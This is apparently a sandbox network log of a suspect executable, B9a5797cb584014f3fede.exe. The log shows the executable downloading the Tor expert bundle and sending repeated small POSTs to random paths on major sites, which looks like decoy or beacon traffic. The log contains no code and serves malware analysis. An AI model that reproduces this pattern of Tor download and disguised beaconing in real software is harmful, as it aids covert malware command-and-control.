Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:21:06 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/wsVZjAbAO0?q=2

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /wsVZjAbAO0?q=2 HTTP/1.1
Host: youtube.com
Content-Length: 0

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:21:06 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/wsVZjAbAO0?q=2

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /wsVZjAbAO0?q=2 HTTP/1.1
Host: youtube.com
Content-Length: 0

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:21:06 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET

https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz

B9a5797cb584014f3fede.exe

Remote address:

159.69.63.226:443

Request

GET /tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz HTTP/1.1
Host: archive.torproject.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 14 Oct 2023 18:21:05 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://uy3qxvwzwoeztnellvvhxh7ju7kfvlsauka7avilcjg7domzxptbq7qd.onion/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz
Last-Modified: Thu, 16 Mar 2023 15:33:36 GMT
ETag: "d42801-5f7062f2cbbbf"
Accept-Ranges: bytes
Content-Length: 13903873
Cache-Control: max-age=2592000
Expires: Mon, 13 Nov 2023 18:21:05 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-gzip
Content-Language: en
GET

https://pornhub.com/nZJ8XB6TLb?q=129

B9a5797cb584014f3fede.exe

Remote address:

66.254.114.41:443

Request

GET /nZJ8XB6TLb?q=129 HTTP/1.1
Host: pornhub.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

server: openresty
date: Sat, 14 Oct 2023 18:21:05 GMT
content-type: text/html
content-length: 166
location: https://www.pornhub.com/nZJ8XB6TLb?q=129
x-frame-options: SAMEORIGIN
rating: RTA-5042-1996-1400-1577-RTA
set-cookie: __s=652ADC11-42FE722901BB1C2393-A15825E; Secure; Samesite=None
set-cookie: __l=652ADC11-42FE722901BB1C2393-A15825E; Secure; Samesite=None; Max-Age=31556926
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://pornhub.com/NXksi90VVl?q=1

B9a5797cb584014f3fede.exe

Remote address:

66.254.114.41:443

Request

GET /NXksi90VVl?q=1 HTTP/1.1
Host: pornhub.com

Response

HTTP/1.1 301 Moved Permanently

server: openresty
date: Sat, 14 Oct 2023 18:21:05 GMT
content-type: text/html
content-length: 166
location: https://www.pornhub.com/NXksi90VVl?q=1
x-frame-options: SAMEORIGIN
rating: RTA-5042-1996-1400-1577-RTA
set-cookie: __s=652ADC11-42FE722901BB1C2393-A15827F; Secure; Samesite=None
set-cookie: __l=652ADC11-42FE722901BB1C2393-A15827F; Secure; Samesite=None; Max-Age=31556926
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://pornhub.com/nZJ8XB6TLb?q=129

B9a5797cb584014f3fede.exe

Remote address:

66.254.114.41:443

Request

GET /nZJ8XB6TLb?q=129 HTTP/1.1
Host: pornhub.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

server: openresty
date: Sat, 14 Oct 2023 18:21:05 GMT
content-type: text/html
content-length: 166
location: https://www.pornhub.com/nZJ8XB6TLb?q=129
x-frame-options: SAMEORIGIN
rating: RTA-5042-1996-1400-1577-RTA
set-cookie: __s=652ADC11-42FE722901BB1C2393-A15828A; Secure; Samesite=None
set-cookie: __l=652ADC11-42FE722901BB1C2393-A15828A; Secure; Samesite=None; Max-Age=31556926
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
POST

http://youtube.com/Ep3hnbR6IC?q=0

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /Ep3hnbR6IC?q=0 HTTP/1.1
Host: youtube.com
Content-Length: 162
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:21:05 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/Ep3hnbR6IC?q=0

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /Ep3hnbR6IC?q=0 HTTP/1.1
Host: youtube.com
Content-Length: 162
Expect: 100-continue

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:21:06 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/Ep3hnbR6IC?q=0

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /Ep3hnbR6IC?q=0 HTTP/1.1
Host: youtube.com
Content-Length: 162
Expect: 100-continue

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:21:06 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/wsVZjAbAO0?q=2

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /wsVZjAbAO0?q=2 HTTP/1.1
Host: youtube.com
Content-Length: 0
POST

http://youtube.com/wsVZjAbAO0?q=2

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /wsVZjAbAO0?q=2 HTTP/1.1
Host: youtube.com
Content-Length: 0
POST

http://youtube.com/wsVZjAbAO0?q=2

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /wsVZjAbAO0?q=2 HTTP/1.1
Host: youtube.com
Content-Length: 0
POST

http://youtube.com/wsVZjAbAO0?q=2

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /wsVZjAbAO0?q=2 HTTP/1.1
Host: youtube.com
Content-Length: 0
POST

http://youtube.com/wsVZjAbAO0?q=2

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /wsVZjAbAO0?q=2 HTTP/1.1
Host: youtube.com
Content-Length: 0
GET

http://eset.com/yLjHhBPMcU?q=108

B9a5797cb584014f3fede.exe

Remote address:

91.228.166.47:80

Request

GET /yLjHhBPMcU?q=108 HTTP/1.1
Host: eset.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Sat, 14 Oct 2023 18:21:05 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: https://www.eset.com/yLjHhBPMcU?q=108
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
POST

http://blockchain.com/GjMLkoZqDj?q=1

B9a5797cb584014f3fede.exe

Remote address:

104.16.30.98:80

Request

POST /GjMLkoZqDj?q=1 HTTP/1.1
Host: blockchain.com
Content-Length: 202
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 14 Oct 2023 18:21:05 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sat, 14 Oct 2023 19:21:05 GMT
Location: https://www.blockchain.com/GjMLkoZqDj?q=1
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8161d70dbc280e34-AMS
POST

http://blockchain.com/GjMLkoZqDj?q=1

B9a5797cb584014f3fede.exe

Remote address:

104.16.30.98:80

Request

POST /GjMLkoZqDj?q=1 HTTP/1.1
Host: blockchain.com
Content-Length: 202
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 14 Oct 2023 18:21:05 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sat, 14 Oct 2023 19:21:05 GMT
Location: https://www.blockchain.com/GjMLkoZqDj?q=1
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8161d70e4ccc0e34-AMS
POST

http://blockchain.com/GjMLkoZqDj?q=1

B9a5797cb584014f3fede.exe

Remote address:

104.16.30.98:80

Request

POST /GjMLkoZqDj?q=1 HTTP/1.1
Host: blockchain.com
Content-Length: 202
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 14 Oct 2023 18:21:05 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sat, 14 Oct 2023 19:21:05 GMT
Location: https://www.blockchain.com/GjMLkoZqDj?q=1
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8161d70e9d130e34-AMS
POST

http://blockchain.com/GjMLkoZqDj?q=1

B9a5797cb584014f3fede.exe

Remote address:

104.16.30.98:80

Request

POST /GjMLkoZqDj?q=1 HTTP/1.1
Host: blockchain.com
Content-Length: 202
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 14 Oct 2023 18:21:05 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sat, 14 Oct 2023 19:21:05 GMT
Location: https://www.blockchain.com/GjMLkoZqDj?q=1
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8161d70ead230e34-AMS
POST

http://blockchain.com/GjMLkoZqDj?q=1

B9a5797cb584014f3fede.exe

Remote address:

104.16.30.98:80

Request

POST /GjMLkoZqDj?q=1 HTTP/1.1
Host: blockchain.com
Content-Length: 202
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 14 Oct 2023 18:21:05 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sat, 14 Oct 2023 19:21:05 GMT
Location: https://www.blockchain.com/GjMLkoZqDj?q=1
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8161d70daa51b902-AMS
POST

http://blockchain.com/GjMLkoZqDj?q=1

B9a5797cb584014f3fede.exe

Remote address:

104.16.30.98:80

Request

POST /GjMLkoZqDj?q=1 HTTP/1.1
Host: blockchain.com
Content-Length: 202
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 14 Oct 2023 18:21:05 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sat, 14 Oct 2023 19:21:05 GMT
Location: https://www.blockchain.com/GjMLkoZqDj?q=1
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8161d70dda74b902-AMS
POST

http://blockchain.com/GjMLkoZqDj?q=1

B9a5797cb584014f3fede.exe

Remote address:

104.16.30.98:80

Request

POST /GjMLkoZqDj?q=1 HTTP/1.1
Host: blockchain.com
Content-Length: 202
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 14 Oct 2023 18:21:05 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sat, 14 Oct 2023 19:21:05 GMT
Location: https://www.blockchain.com/GjMLkoZqDj?q=1
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8161d70dfa99b902-AMS
POST

http://blockchain.com/GjMLkoZqDj?q=1

B9a5797cb584014f3fede.exe

Remote address:

104.16.30.98:80

Request

POST /GjMLkoZqDj?q=1 HTTP/1.1
Host: blockchain.com
Content-Length: 202
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 14 Oct 2023 18:21:05 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sat, 14 Oct 2023 19:21:05 GMT
Location: https://www.blockchain.com/GjMLkoZqDj?q=1
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8161d70e1aabb902-AMS
POST

http://blockchain.com/GjMLkoZqDj?q=1

B9a5797cb584014f3fede.exe

Remote address:

104.16.30.98:80

Request

POST /GjMLkoZqDj?q=1 HTTP/1.1
Host: blockchain.com
Content-Length: 202
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 14 Oct 2023 18:21:05 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sat, 14 Oct 2023 19:21:05 GMT
Location: https://www.blockchain.com/GjMLkoZqDj?q=1
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8161d70e3aceb902-AMS
GET

https://openai.com/ftOpuXgkwC?q=229

B9a5797cb584014f3fede.exe

Remote address:

13.107.213.67:443

Request

GET /ftOpuXgkwC?q=229 HTTP/1.1
Host: openai.com
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Sat, 14 Oct 2023 18:21:05 GMT
Content-Type: text/html
Content-Length: 1944
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Range: bytes 0-1943/1944
ETag: "48563893"
Last-Modified: Fri, 13 Oct 2023 23:39:46 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Referrer-Policy: same-origin
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
x-azure-ref: 20231014T182105Z-v0mv08869h4kr7usprrmums9a000000001v000000002upud
X-Cache: TCP_MISS
POST

https://openai.com/ScdEUc6SlP?q=1

B9a5797cb584014f3fede.exe

Remote address:

13.107.213.67:443

Request

POST /ScdEUc6SlP?q=1 HTTP/1.1
Host: openai.com
Content-Length: 121
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 405 Method Not Allowed

Cache-Control: no-cache
Allow: GET, HEAD, OPTIONS
X-Cache: CONFIG_NOCACHE
X-Azure-Ref: 0EdwqZQAAAACAjunnfT3qR4lsOM4MzVdkQlJVMzBFREdFMDQxOAA3ZjE3YzA2NC00MTQ5LTQ2ODctOTk4Yy00ZDliMjE2YjI1OGY=
Date: Sat, 14 Oct 2023 18:21:04 GMT
Content-Length: 0
POST

http://google.com/xINnIoXK0o?q=0

B9a5797cb584014f3fede.exe

Remote address:

142.250.179.142:80

Request

POST /xINnIoXK0o?q=0 HTTP/1.1
Host: google.com
Content-Length: 189
Expect: 100-continue

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1571
Date: Sat, 14 Oct 2023 18:21:05 GMT
Connection: close
DNS

www.eset.com

B9a5797cb584014f3fede.exe

Remote address:

8.8.8.8:53

Request

www.eset.com

IN A

Response

www.eset.com

IN CNAME

www-eset-com.trafficmanager.net

www-eset-com.trafficmanager.net

IN CNAME

www.eset.com.edgesuite.net

www.eset.com.edgesuite.net

IN CNAME

a1281.dscr.akamai.net

a1281.dscr.akamai.net

IN A

23.72.252.139

a1281.dscr.akamai.net

IN A

23.72.252.169
GET

https://www.eset.com/yLjHhBPMcU?q=108

B9a5797cb584014f3fede.exe

Remote address:

23.72.252.139:443

Request

GET /yLjHhBPMcU?q=108 HTTP/1.1
Host: www.eset.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Content-Type: text/html
Content-Length: 162
Location: https://www.eset.com/yLjHhBPMcU/?q=108
Referrer-Policy: no-referrer-when-downgrade
Feature-Policy: accelerometer 'none'; camera 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; payment 'none'; usb 'none'; ambient-light-sensor 'none'; autoplay 'none'; encrypted-media 'none'; fullscreen 'self' https://www.youtube.com; midi 'none'; picture-in-picture 'none'; speaker 'none'; vr 'none'
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block; report=https://eset.report-uri.com/r/d/xss/enforce
X-Content-Type-Options: nosniff
Access-Control-Allow-Origin: https://www.eset.com
Content-Security-Policy: default-src 'self'; connect-src 'self' http://ad.doubleclick.net https://*.analytics.google.com https://*.clarity.ms https://*.demdex.net https://*.eset.com https://*.googlesyndication.com https://*.hotjar.com https://*.hotjar.io https://*.tt.omtrdc.net https://adservice.google.com https://analytics.google.com https://analytics.twitter.com https://bat.bing.com https://c.go-mpulse.net https://cdn.acsbapp.com https://cdn.linkedin.oribi.io https://cdn1.esetstatic.com https://cookies-data.onetrust.io https://ep.smct.co https://eset.tt.omtrdc.net https://geolocation.onetrust.com https://googleads.g.doubleclick.net https://ipb.smct.co https://ipb.smct.io https://js.smct.co https://js.smct.io https://maps.googleapis.com https://privacyportal.onetrust.com https://region1.google-analytics.com https://replay.uxtweak.com https://s.yimg.com https://script.crazyegg.com https://smct.co https://stats.g.doubleclick.net https://tracker.clickguard.com https://www.facebook.com https://www.g2.com https://www.google-analytics.com https://www.google.by https://www.google.ch https://www.google.co.uk https://www.google.co.uz https://www.google.com https://www.google.com.tj https://www.google.com.tr https://www.google.ie https://www.google.kg https://www.google.kz https://www.google.lt https://www.google.lv https://www.google.pl https://www.google.ru https://www.googletagmanager.com wss://*.hotjar.com; font-src 'self' data: https://cdn.userway.org https://fonts.smct.co https://fonts.smct.io https://script.hotjar.com; frame-src 'self' https://*.fls.doubleclick.net https://8117415.fls.doubleclick.net https://bid.g.doubleclick.net https://download.eset.com https://eset.demdex.net https://hemsync.clickagy.com https://int.form.eset.com https://js.smct.io https://ls.smct.co https://protectdemo.eset.com https://smct.co https://tpc.googlesyndication.com https://unity.survey-solutions.cloud https://vars.hotjar.com https://widget.trustpilot.com https://www.facebook.com https://www.google.com https://www.googletagmanager.com https://www.youtube-nocookie.com https://www.youtube.com; img-src 'self' data: http://ad.doubleclick.net https://*.adform.net https://*.ads.linkedin.com https://*.yahoo.co.jp https://ad.doubleclick.net https://ade.googlesyndication.com https://adservice.google.at https://adservice.google.ch https://adservice.google.co.jp https://adservice.google.com https://adservice.google.de https://analytics.google.com https://analytics.twitter.com https://bat.bing.com https://c.bing.com https://c.clarity.ms https://captcha.eset.com https://cdn.esetstatic.com https://cdn.jsdelivr.net https://cdn.smct.co https://cdn.smct.io https://cdn1.esetstatic.com https://cm.everesttech.net https://cm.g.doubleclick.net https://connect.facebook.net https://dc.ads.linkedin.com https://dpm.demdex.net https://events.smct.co https://googleads.g.doubleclick.net https://images.g2crowd.com https://maps.googleapis.com https://pagead2.googlesyndication.com https://pubads.g.doubleclick.net https://px.ads.linkedin.com https://region1.analytics.google.com https://region1.google-analytics.com https://script.hotjar.com https://sgtm.eset.com https://ssitecat.eset.com https://ssl.google-analytics.com https://static.hotjar.com https://stats.g.doubleclick.net https://t.co https://tribl.io https://www.facebook.com https://www.google-analytics.com https://www.google.ad https://www.google.ae https://www.google.al https://www.google.am https://www.google.at https://www.google.az https://www.google.ba https://www.google.be https://www.google.bf https://www.google.bg https://www.google.bi https://www.google.bj https://www.google.bs https://www.google.bt https://www.google.by https://www.google.ca https://www.google.cd https://www.google.cf https://www.google.cg https://www.google.ch https://www.google.ci https://www.google.cl https://www.google.cm https://www.google.cn https://www.google.co.ao https://www.google.co.bw https://www.google.co.cr https://www.google.co.id https://www.google.co.il https://www.google.co.in https://www.google.co.jp https://www.google.co.ke https://www.google.co.kr https://www.google.co.ls https://www.google.co.ma https://www.google.co.mz https://www.google.co.nz https://www.google.co.th https://www.google.co.tz https://www.google.co.ug https://www.google.co.uk https://www.google.co.uz https://www.google.co.ve https://www.google.co.vi https://www.google.co.za https://www.google.co.zm https://www.google.co.zw https://www.google.com https://www.google.com.af https://www.google.com.ag https://www.google.com.ar https://www.google.com.au https://www.google.com.bd https://www.google.com.bh https://www.google.com.bn https://www.google.com.bo https://www.google.com.br https://www.google.com.bz https://www.google.com.co https://www.google.com.cu https://www.google.com.cy https://www.google.com.do https://www.google.com.ec https://www.google.com.eg https://www.google.com.et https://www.google.com.fj https://www.google.com.gh https://www.google.com.gi https://www.google.com.gt https://www.google.com.hk https://www.google.com.jm https://www.google.com.kh https://www.google.com.kw https://www.google.com.lb https://www.google.com.ly https://www.google.com.mm https://www.google.com.mt https://www.google.com.mx https://www.google.com.my https://www.google.com.na https://www.google.com.ng https://www.google.com.ni https://www.google.com.np https://www.google.com.om https://www.google.com.pa https://www.google.com.pe https://www.google.com.pg https://www.google.com.ph https://www.google.com.pk https://www.google.com.pr https://www.google.com.py https://www.google.com.qa https://www.google.com.sa https://www.google.com.sb https://www.google.com.sg https://www.google.com.sl https://www.google.com.sv https://www.google.com.tj https://www.google.com.tr https://www.google.com.tw https://www.google.com.ua https://www.google.com.uy https://www.google.com.vc https://www.google.com.vn https://www.google.cv https://www.google.cz https://www.google.de https://www.google.dj https://www.google.dk https://www.google.dm https://www.google.dz https://www.google.ee https://www.google.es https://www.google.fi https://www.google.fr https://www.google.ga https://www.google.ge https://www.google.gg https://www.google.gl https://www.google.gm https://www.google.gr https://www.google.gy https://www.google.hn https://www.google.hr https://www.google.ht https://www.google.hu https://www.google.ie https://www.google.im https://www.google.iq https://www.google.is https://www.google.it https://www.google.je https://www.google.jo https://www.google.kg https://www.google.ki https://www.google.kz https://www.google.la https://www.google.li https://www.google.lk https://www.google.lt https://www.google.lu https://www.google.lv https://www.google.md https://www.google.me https://www.google.mg https://www.google.mk https://www.google.ml https://www.google.mn https://www.google.mu https://www.google.mv https://www.google.mw https://www.google.ne https://www.google.nl https://www.google.no https://www.google.nr https://www.google.pl https://www.google.ps https://www.google.pt https://www.google.ro https://www.google.rs https://www.google.ru https://www.google.rw https://www.google.sc https://www.google.se https://www.google.si https://www.google.sk https://www.google.sm https://www.google.sn https://www.google.so https://www.google.sr https://www.google.td https://www.google.tg https://www.google.tl https://www.google.tm https://www.google.tn https://www.google.tt https://www.google.vg https://www.google.vu https://www.googletagmanager.com https://www.hotjar.com https://www.linkedin.com; manifest-src 'none'; media-src 'self'; object-src 'self'; prefetch-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline' https://*.replay.uxtweak.com https://*.salesforceliveagent.com https://acsbap.com https://acsbapp.com https://assets.esetstatic.com https://bat.bing.com https://cdn.esetstatic.com https://cdn.jsdelivr.net https://cdn.linkedin.oribi.io https://cdn1.esetstatic.com https://cdnjs.cloudflare.com https://connect.facebook.net https://d.la1-c2-cdg.salesforceliveagent.com https://embed.tawk.to https://googleads.g.doubleclick.net https://img06.en25.com https://invitejs.trustpilot.com https://js.smct.co https://js.smct.io https://maps.googleapis.com https://nowexttype.com https://pagead2.googlesyndication.com https://platform.twitter.com https://s786665.t.eloqua.com https://script.hotjar.com https://sgtm.eset.com https://smct.co https://snap.licdn.com https://ssl.google-analytics.com https://static.ads-twitter.com https://static.hotjar.com https://store.eset.com https://tpc.googlesyndication.com https://tribl.io https://widget.trustpilot.com https://www.clarity.ms https://www.google-analytics.com https://www.google.ae https://www.google.am https://www.google.at https://www.google.be https://www.google.bg https://www.google.bs https://www.google.by https://www.google.ca https://www.google.cg https://www.google.ch https://www.google.ci https://www.google.cl https://www.google.cm https://www.google.co.id https://www.google.co.il https://www.google.co.in https://www.google.co.jp https://www.google.co.ke https://www.google.co.ma https://www.google.co.nz https://www.google.co.th https://www.google.co.uk https://www.google.co.uz https://www.google.co.ve https://www.google.co.za https://www.google.co.zw https://www.google.com https://www.google.cz https://www.google.de https://www.google.dj https://www.google.dz https://www.google.ee https://www.google.es https://www.google.fi https://www.google.fr https://www.google.ge https://www.google.gr https://www.google.hr https://www.google.hu https://www.google.ie https://www.google.kg https://www.google.kz https://www.google.lk https://www.google.lt https://www.google.md https://www.google.me https://www.google.mk https://www.google.nl https://www.google.pl https://www.google.ps https://www.google.pt https://www.google.ro https://www.google.ru https://www.google.se https://www.google.si https://www.google.sk https://www.google.tn https://www.googleadservices.com https://www.googleoptimize.com https://www.googletagmanager.com https://www.youtube.com; style-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net https://fonts.smct.co https://fonts.smct.io https://script.hotjar.com https://static.hotjar.com; worker-src 'self'; report-uri https://www-eset-com.api.cspconsole.com/v1/csp/report; report-to default;
Report-To: {"group":"default","max_age":31536000,"endpoints":[{"url":"https://www-eset-com.api.cspconsole.com/v1/csp/report"}],"include_subdomains":false}
X-EDPS-Request-Status: normal
Strict-Transport-Security: max-age=15724800
Cache-Control: public, max-age=3600
Date: Sat, 14 Oct 2023 18:21:05 GMT
Connection: keep-alive
Set-Cookie: TS01a40e5a=016c9a7a13c8dc47858bac5565cb42734e167c28884ace865ff406a08d9afa224f2acc36aba8cf6b18aa3b65e170880536f0466eb1; Path=/; Domain=.eset.com
GET

https://www.eset.com/yLjHhBPMcU/?q=108

B9a5797cb584014f3fede.exe

Remote address:

23.72.252.139:443

Request

GET /yLjHhBPMcU/?q=108 HTTP/1.1
Host: www.eset.com

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer-when-downgrade
Feature-Policy: accelerometer 'none'; camera 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; payment 'none'; usb 'none'; ambient-light-sensor 'none'; autoplay 'none'; encrypted-media 'none'; fullscreen 'self' https://www.youtube.com; midi 'none'; picture-in-picture 'none'; speaker 'none'; vr 'none'
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block; report=https://eset.report-uri.com/r/d/xss/enforce
X-Content-Type-Options: nosniff
Access-Control-Allow-Origin: https://www.eset.com
